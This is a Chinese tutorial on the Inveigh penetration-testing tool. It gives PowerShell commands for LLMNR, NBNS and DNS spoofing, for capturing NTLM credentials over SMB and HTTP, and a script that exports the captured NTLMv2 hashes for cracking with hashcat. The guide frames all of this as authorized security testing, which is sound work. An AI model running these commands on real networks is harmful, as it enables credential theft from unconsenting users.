5个步骤掌握Inveigh:跨平台安全测试指南
Inveigh是一款基于.NET开发的跨平台网络安全工具,专为渗透测试人员设计,可在IPv4和IPv6环境下执行网络协议分析与安全评估。作为网络安全工具领域的瑞士军刀,它集成了多种协议监听与响应功能,帮助安全工程师在渗透测试实战中快速识别网络漏洞,强化防御体系。
如何快速上手Inveigh?
环境准备
首先通过以下命令克隆项目仓库并进入工作目录:
git clone https://gitcode.com/gh_mirrors/in/Inveigh # 克隆项目代码
cd Inveigh # 进入项目根目录
基础启动命令
Import-Module .\Inveigh.psd1; Invoke-Inveigh # 加载模块并启动默认配置
💡 新手提示:首次运行需以管理员权限启动PowerShell,确保网络监听权限。
核心功能卡片
| 功能模块 | 作用说明 | 应用场景 |
|---|---|---|
| LLMNR监听 | 捕获链路本地多播名称解析请求 | 内网主机发现 |
| DNS欺骗 | 响应伪造DNS查询 | 钓鱼攻击模拟 |
| SMB捕获 | 记录NTLM挑战/响应 | 凭证分析与安全审计 |
| HTTP监听 | 收集Web认证信息 | Web应用渗透测试 |
📌 重点总结:Inveigh通过模拟合法服务响应,帮助安全测试人员评估网络设备的认证机制安全性,所有操作需在授权环境下进行。
核心配置的5个技巧
参数速查表
| 参数类别 | 关键参数 | 作用说明 |
|---|---|---|
| 网络设置 | -IP 192.168.1.10 |
指定监听IP地址 |
| 协议控制 | -LLMNR Y -NBNS N |
启用LLMNR禁用NBNS |
| 输出管理 | -FileOutput Y -FileOutputDirectory ./logs |
保存日志到指定目录 |
| 认证配置 | -HTTPAuth NTLM |
设置HTTP认证类型 |
| 高级过滤 | -SpooferIPsIgnore 10.0.0.0/8 |
忽略特定网段请求 |
实用配置示例
# 仅监听LLMNR并记录结果到文件
Invoke-Inveigh -IP 192.168.1.10 -LLMNR Y -NBNS N -FileOutput Y -FileOutputDirectory ./capture_logs
🔧 配置技巧:使用-Inspect参数可进入流量分析模式,仅监听不响应,适合初步网络探测。
📌 重点总结:合理组合参数可精确控制工具行为,避免对生产环境造成意外影响。建议先在测试环境验证配置效果。
高级应用的2个实战方案
方案1:企业内网安全评估
# 多协议协同监听配置
Invoke-Inveigh -IP 10.1.0.5 -DNS Y -LLMNR Y -HTTP Y -SMB Y `
-SpooferThresholdNetwork 3 -ConsoleOutput Medium
💡 进阶技巧:-SpooferThresholdNetwork 3设置仅对3个以上主机请求的域名进行响应,减少误报。
方案2:自动化测试脚本
创建Inveigh-Auto.ps1实现定时任务:
$runTime = 60 # 运行60分钟
$outputDir = ".\daily_scan_$(Get-Date -Format yyyyMMdd)"
New-Item -ItemType Directory -Path $outputDir | Out-Null
Invoke-Inveigh -RunTime $runTime -FileOutput Y `
-FileOutputDirectory $outputDir -SpooferLearning Y
📌 重点总结:高级应用需结合具体测试目标调整参数,建议配合Wireshark等工具进行流量联动分析。
新手常见陷阱及解决方案
陷阱1:权限不足导致监听失败
❌ 错误提示:
无法绑定到端口5355
✅ 解决方案:以管理员身份运行PowerShell,或使用-Elevated Y参数强制权限检查
陷阱2:证书问题导致HTTPS功能异常
❌ 现象:HTTPS监听启动后无法捕获流量
✅ 解决方案:使用-HTTPSForceCertDelete Y参数清除残留证书,重新生成自签名证书
陷阱3:日志文件权限问题
❌ 错误:
无法写入日志文件
✅ 解决方案:确保输出目录存在且有写入权限,或使用-FileOutputDirectory指定可写路径
📌 重点总结:遇到问题先检查系统事件日志和Inveigh输出日志,大部分权限问题可通过管理员模式解决。
如何扩展Inveigh的测试能力?
协议扩展
通过修改Listeners目录下的协议处理类(如DNSListener.cs)添加自定义协议支持,实现对特定工业协议的安全测试。
集成第三方工具
结合hashcat进行凭证破解:
# 将捕获的NTLMv2哈希导出到hashcat格式
Get-Content ./Inveigh-NTLMv2.txt | Select-Object -Skip 1 | ForEach-Object {
$parts = $_.Split('|')
"$($parts[3]):$($parts[4]):$($parts[5]):$($parts[6])"
} | Out-File -Encoding ASCII ./hashcat_input.txt
# 使用hashcat破解
hashcat -m 5600 ./hashcat_input.txt ./wordlist.txt
📌 重点总结:Inveigh的模块化设计使其具备良好扩展性,通过二次开发可适配特定场景的安全测试需求。
通过以上五个步骤,您已掌握Inveigh的核心功能与实战技巧。作为跨平台安全测试工具,它不仅能帮助发现网络中的认证漏洞,更能提升安全团队对企业内网的风险认知。始终记住:所有测试必须获得明确授权,遵守网络安全相关法律法规。
atomcodeClaude Code 的开源替代方案。连接任意大模型,编辑代码,运行命令,自动验证 — 全自动执行。用 Rust 构建,极致性能。 | An open-source alternative to Claude Code. Connect any LLM, edit code, run commands, and verify changes — autonomously. Built in Rust for speed. Get StartedRust071- DDeepSeek-V4-ProDeepSeek-V4-Pro(总参数 1.6 万亿,激活 49B)面向复杂推理和高级编程任务,在代码竞赛、数学推理、Agent 工作流等场景表现优异,性能接近国际前沿闭源模型。Python00
MiniMax-M2.7MiniMax-M2.7 是我们首个深度参与自身进化过程的模型。M2.7 具备构建复杂智能体应用框架的能力,能够借助智能体团队、复杂技能以及动态工具搜索,完成高度精细的生产力任务。Python00
GLM-5.1GLM-5.1是智谱迄今最智能的旗舰模型,也是目前全球最强的开源模型。GLM-5.1大大提高了代码能力,在完成长程任务方面提升尤为显著。和此前分钟级交互的模型不同,它能够在一次任务中独立、持续工作超过8小时,期间自主规划、执行、自我进化,最终交付完整的工程级成果。Jinja00
Kimi-K2.6Kimi K2.6 是一款开源的原生多模态智能体模型,在长程编码、编码驱动设计、主动自主执行以及群体任务编排等实用能力方面实现了显著提升。Python00
Hy3-previewHy3 preview 是由腾讯混元团队研发的2950亿参数混合专家(Mixture-of-Experts, MoE)模型,包含210亿激活参数和38亿MTP层参数。Hy3 preview是在我们重构的基础设施上训练的首款模型,也是目前发布的性能最强的模型。该模型在复杂推理、指令遵循、上下文学习、代码生成及智能体任务等方面均实现了显著提升。Python00